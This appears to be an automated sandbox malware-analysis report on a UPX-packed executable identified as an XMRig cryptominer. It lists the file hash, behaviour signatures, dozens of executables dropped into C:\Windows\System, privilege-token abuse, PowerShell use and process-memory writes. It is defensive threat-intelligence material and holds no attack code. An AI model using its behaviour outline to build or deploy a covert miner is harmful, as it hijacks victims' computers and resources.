Malware Analysis Report

2025-01-06 20:26

Sample ID 240614-n8yx7azdrh
Target bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe
SHA256 a112ee788444cf616ea870e490ddc6898870d69c9fc699d5bcf4efc76b5435d0
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a112ee788444cf616ea870e490ddc6898870d69c9fc699d5bcf4efc76b5435d0

Threat Level: Known bad

The file bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:04

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:04

Reported

2024-06-14 12:07

Platform

win7-20240220-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\CKlACnX.exe N/A
N/A N/A C:\Windows\System\ODVXDOO.exe N/A
N/A N/A C:\Windows\System\gUmoePo.exe N/A
N/A N/A C:\Windows\System\oIGTReJ.exe N/A
N/A N/A C:\Windows\System\UYNjgSm.exe N/A
N/A N/A C:\Windows\System\eXiiJTD.exe N/A
N/A N/A C:\Windows\System\ePYaIyB.exe N/A
N/A N/A C:\Windows\System\KphViNM.exe N/A
N/A N/A C:\Windows\System\jjiNDHr.exe N/A
N/A N/A C:\Windows\System\GFacxhH.exe N/A
N/A N/A C:\Windows\System\oMwjven.exe N/A
N/A N/A C:\Windows\System\jyRvaQg.exe N/A
N/A N/A C:\Windows\System\xoJLLzR.exe N/A
N/A N/A C:\Windows\System\yasqtdR.exe N/A
N/A N/A C:\Windows\System\avckCSe.exe N/A
N/A N/A C:\Windows\System\hpsMIJn.exe N/A
N/A N/A C:\Windows\System\lomDjDP.exe N/A
N/A N/A C:\Windows\System\xnSHUHj.exe N/A
N/A N/A C:\Windows\System\UfjpEsM.exe N/A
N/A N/A C:\Windows\System\HjhqejW.exe N/A
N/A N/A C:\Windows\System\RKFhkFD.exe N/A
N/A N/A C:\Windows\System\mMXnQHy.exe N/A
N/A N/A C:\Windows\System\PkOXnQL.exe N/A
N/A N/A C:\Windows\System\CiZUzks.exe N/A
N/A N/A C:\Windows\System\hSdryMs.exe N/A
N/A N/A C:\Windows\System\LaBLYyC.exe N/A
N/A N/A C:\Windows\System\ddWPCqN.exe N/A
N/A N/A C:\Windows\System\mwWEcqR.exe N/A
N/A N/A C:\Windows\System\GlUaJIp.exe N/A
N/A N/A C:\Windows\System\vgdieTL.exe N/A
N/A N/A C:\Windows\System\ADrxwTW.exe N/A
N/A N/A C:\Windows\System\VWpXCXf.exe N/A
N/A N/A C:\Windows\System\TXpzdpH.exe N/A
N/A N/A C:\Windows\System\AIJHdmH.exe N/A
N/A N/A C:\Windows\System\ukQSYaG.exe N/A
N/A N/A C:\Windows\System\OHttPzL.exe N/A
N/A N/A C:\Windows\System\bTmkDVI.exe N/A
N/A N/A C:\Windows\System\McwGZrC.exe N/A
N/A N/A C:\Windows\System\kPGrKBq.exe N/A
N/A N/A C:\Windows\System\xdVWsbT.exe N/A
N/A N/A C:\Windows\System\btIwtAo.exe N/A
N/A N/A C:\Windows\System\VipnKgc.exe N/A
N/A N/A C:\Windows\System\IPiDqEe.exe N/A
N/A N/A C:\Windows\System\xbKiCPM.exe N/A
N/A N/A C:\Windows\System\MbKhfpD.exe N/A
N/A N/A C:\Windows\System\pOPMznh.exe N/A
N/A N/A C:\Windows\System\irsziDH.exe N/A
N/A N/A C:\Windows\System\UYcASVq.exe N/A
N/A N/A C:\Windows\System\HUNmQKD.exe N/A
N/A N/A C:\Windows\System\XKiHnNx.exe N/A
N/A N/A C:\Windows\System\ljrjAYH.exe N/A
N/A N/A C:\Windows\System\qEzzRYv.exe N/A
N/A N/A C:\Windows\System\TTqmQCt.exe N/A
N/A N/A C:\Windows\System\ciVQjup.exe N/A
N/A N/A C:\Windows\System\lNvmite.exe N/A
N/A N/A C:\Windows\System\ioNYSCu.exe N/A
N/A N/A C:\Windows\System\MZBBuAP.exe N/A
N/A N/A C:\Windows\System\sIDnrOO.exe N/A
N/A N/A C:\Windows\System\sOmPLNp.exe N/A
N/A N/A C:\Windows\System\hIcoxEP.exe N/A
N/A N/A C:\Windows\System\hlVYeYT.exe N/A
N/A N/A C:\Windows\System\KRjEaVp.exe N/A
N/A N/A C:\Windows\System\jHUxXVg.exe N/A
N/A N/A C:\Windows\System\butKUEf.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xIyXxTM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\PYpNulv.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\JNkkTMd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\uNhZHtV.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\DebZDxm.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZnMVHhu.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\EIhCjxM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\iXLnuJO.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\LVrMsop.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\bLuYYBc.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SLrWNtH.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\bmkDRtT.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\uUEcXTI.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\RfyYToT.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\rybbIFd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\yOAEwJJ.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\BjhdDwC.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\xmXjqsz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\wblqqyD.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\BhfBRnH.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\WUHXPmd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\fTkECAG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\QkKoSkz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\onErZUv.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\EdZMuPK.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\vfmgwhz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZeiVkWN.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\LaDMGMj.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\OgYgAAS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\AKakboT.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\RWOfWvx.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\qaDlqMV.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\UQTzhsK.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\dWvqsHj.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\FTryZlW.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\kCWjICk.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SmnkjNm.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\mtGmlZm.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\YrrbtER.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\JSGTTMM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\LNVwtAX.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\OnMDmuT.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\siOLiSS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\cLzTiUV.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\FtRIAkm.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\OsFymWd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\NKNJSfD.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\KMnZreS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\vnNYbtS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\TuvKSGd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\MekxnuE.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\GKmPMTC.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SWfAPUh.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\tJaLpRY.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\IizKity.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\zaOCDgR.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\obdgmWS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\vCIqRyi.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\MtXAees.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\qdNFFhm.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ccyZCTq.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ljoKyKz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\NkcPCMF.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\vKRbzUF.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CKlACnX.exe
PID 2092 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CKlACnX.exe
PID 2092 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CKlACnX.exe
PID 2092 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ODVXDOO.exe
PID 2092 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ODVXDOO.exe
